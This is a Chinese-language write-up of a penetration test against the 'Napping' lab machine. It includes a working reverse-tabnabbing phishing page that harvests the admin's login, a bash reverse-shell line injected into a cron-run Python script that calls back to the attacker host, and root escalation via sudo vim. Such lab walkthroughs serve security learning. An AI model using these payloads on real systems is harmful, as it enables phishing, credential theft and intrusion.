Napping: 1.0.1
端口扫描主机发现
探测存活主机,
3是靶机,kali的ip为192.168.56.101
2
3
4
5
6
7
8
9
10
11
12nmap -sP 192.168.56.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-10 14:32 CST
Nmap scan report for 192.168.56.1
Host is up (0.00036s latency).
MAC Address: 0A:00:27:00:00:14 (Unknown)
Nmap scan report for 192.168.56.2
Host is up (0.00052s latency).
MAC Address: 08:00:27:F3:77:5D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.3
Host is up (0.00048s latency).
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.10探测主机所有开放端口
1
2
3
4
5
6
7
8
9nmap -sT -min-rate 10000 -p- 192.168.56.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-10 14:32 CST
Nmap scan report for 192.168.56.3
Host is up (0.00068s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)探测服务版本以及系统版本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16nmap -sV -sT -O -p 80,22 192.168.56.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-10 14:33 CST
Nmap scan report for 192.168.56.3
Host is up (0.00049s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel扫描漏洞
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21nikto -host 192.168.56.3 -port 80,22
- Nikto v2.5.0
---------------------------------------------------------------------------
---------------------------------------------------------------------------
+ Target IP: 192.168.56.3
+ Target Hostname: 192.168.56.3
+ Target Port: 80
+ Start Time: 2024-11-10 14:33:43 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ 8106 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-11-10 14:34:08 (GMT8) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested优先级依旧
80>22,不过没扫描出什么漏洞
web渗透
访问主页,
CSS使用的是bootstrap的链接,没有魔法可能会加载不了样式
扫描目录
1
2
3
4
5
6
7dirsearch -u http://192.168.56.3 -x 403,404
//
[15:05:00] Starting:
[15:05:21] 200 - 0B - /config.php
[15:05:31] 200 - 539B - /index.php/login/
[15:05:34] 302 - 0B - /logout.php -> index.php
[15:05:45] 200 - 563B - /register.php/index.php/login/登录页/register.php注册页
注册用户
test密码123456,登录后台跳转到welcome.phpwelcome.php
1
2
3
4
5
6
Hello, test! Welcome to our free blog promotions site.
Please submit your link so that we can get started. All links will be reviewed by our admin
##
你好,test!欢迎来到我们的免费博客推广网站。
请提交您的链接,以便我们开始。所有链接都将由我们的管理员审核说是输入链接后管理员会获取检查我们链接
输入链接,链接提交后会有个
here标签,发现是Reverse Tabnabbing什么是
Reverse Tabnabbing:https://owasp.org/www-community/attacks/Reverse_Tabnabbing
制作钓鱼页面
恶意页面
a.html(跳转用)1
2
3
4
5
6
7
8
9<!DOCTYPE html>
<html>
<body>
<script>
if(window.opener) mainframe.location.replace=('http://192.168.56.10:1234/login.htm');
if(window.opener != window) mainframe.location.replace=('http://192.168.56.10:1234/login.htm');
</script>
</body>
</html>钓鱼页面,使用靶机的
login.htm页面1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Login</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
<style>
body{ font: 14px sans-serif; }
.wrapper{ width: 360px; padding: 20px; }
</style>
</head>
<body>
<div class="wrapper">
<h2>Login</h2>
<p>Please fill in your credentials to login.</p>
<div class="alert alert-danger">Invalid username or password.</div>
<form action="http://192.168.56.10:1234" method="post">
<div class="form-group">
<label>Username</label>
<input type="text" name="username" class="form-control " value="test">
<span class="invalid-feedback"></span>
</div>
<div class="form-group">
<label>Password</label>
<input type="password" name="password" class="form-control ">
<span class="invalid-feedback"></span>
</div>
<div class="form-group">
<input type="submit" class="btn btn-primary" value="Login">
</div>
<p>Don't have an account? <a href="register.php">Sign up now</a>.</p>
</form>
</div>
</body>
</html>都放在
kali的一个文件夹下1
2
3┌──(root㉿kali)-[~/Desktop/test/diaoyu]
└─# ls
a.html Login_files Login.htmkali使用python开启简易web服务器(~/Desktop/test/diaoyu文件夹下)1
python -m http.server 80
kali开启监听1
nc -lvp 1234
然后在页面上提交
http://192.168.56.10/a.html,随后等待管理员检查链接简易服务器发现有人请求
a.html了1
2
3python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.3 - - [10/Nov/2024 16:22:05] "GET /a.html HTTP/1.1" 200 -查看nc,得到用户凭证
1
2
3
4
5
6
7
8
9
10
11
12
13
14nc -lvp 1234
listening on [any] 1234 ...
192.168.56.3: inverse host lookup failed: Unknown host
connect to [192.168.56.10] from (UNKNOWN) [192.168.56.3] 43212
POST /login.htm HTTP/1.1
Host: 192.168.56.10:1234
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
username=daniel&password=C%40ughtm3napping123
获得shell
得到用户凭证后,尝试登录
ssh1
2daniel
C@ughtm3napping123登陆成功
查看权限
1 | daniel@napping:~$ whoami │┌──(root㉿kali)-[~/Desktop/test/diaoyu] |
查找敏感文件
suid以及sudo没有可利用的寻找数据库配置文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17daniel@napping:/var/www/html$ cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'adrian');
define('DB_PASSWORD', 'P@sswr0d456');
define('DB_NAME', 'website');
/* Attempt to connect to MySQL database */
$mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($mysqli === false){
die("ERROR: Could not connect. " . $mysqli->connect_error);
}
?>发现
adrian的账号密码
尝试登录
adrian账户,无法登录登录数据库查找敏感信息,没有可以用的信息
继续寻找敏感文件
知道存在
adrian用户,在adrian的家目录存在site_status.txt,我们拥有读权限1
2
3
4
5
6
7
8
9# site_status.txt
....
Site is Up: 10/11/2024 09:58:01
Site is Up: 10/11/2024 10:00:02
Site is Up: 10/11/2024 10:02:01
Site is Up: 10/11/2024 10:04:01
Site is Up: 10/11/2024 10:06:01
Site is Up: 10/11/2024 10:08:01
Site is Up: 10/11/2024 10:10:02一长串的类似的文本,应该是服务器启动时记录的,每两分钟一次,应该是有
cron任务同目录下还存在
query.py文件1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20from datetime import datetime
import requests
now = datetime.now()
r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
f = open("site_status.txt","a")
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
f.write("Site is Up: ")
f.write(dt_string)
f.write("\n")
f.close()
else:
f = open("site_status.txt","a")
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
f.write("Check Out Site: ")
f.write(dt_string)
f.write("\n")
f.close()得知
site_status.txt的内容时由该文件产生查看权限,刚好我们也是
administrators的用户1
2daniel@napping:/home/adrian$ ls -al query.py
-rw-rw-r-- 1 adrian administrators 481 Oct 30 2021 query.py
我们拥有修改
query.py的权限,那就是拥有adrian用户的权限了修改
query.py,在顶部添加1
2import os;
os.system("bash -c 'bash -i >& /dev/tcp/192.168.56.10/1234 0>&1'");同时开启监听
等待执行
1
2
3
4
5
6
7nc -lvp 1234
listening on [any] 1234 ...
192.168.56.3: inverse host lookup failed: Unknown host
connect to [192.168.56.10] from (UNKNOWN) [192.168.56.3] 43506
bash: cannot set terminal process group (3289): Inappropriate ioctl for device
bash: no job control in this shell
adrian@napping:~$获得用户
adrian的shell
查找敏感文件
第一个flag文件
1
2adrian@napping:~$ cat user.txt
You are nearly there!sudo -l,K.O.1
2
3
4
5
6
7
8adrian@napping:~$ sudo -l
Matching Defaults entries for adrian on napping:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User adrian may run the following commands on napping:
(root) NOPASSWD: /usr/bin/vim
adrian@napping:~$
vim可以免密码以root账号执行,故可以提权1
adrian@napping:~$ sudo vim
然后在命令行模式下输入
!/bin/bash1
2
3
4:!/bin/bash
id
uid=0(root) gid=0(root) groups=0(root)获得root!!!!
读取
flag文件1
2cat root.txt
Admins just can't stay awake tsk tsk tsk
总结
学习到Reverse_Tabnabbing的钓鱼攻击方式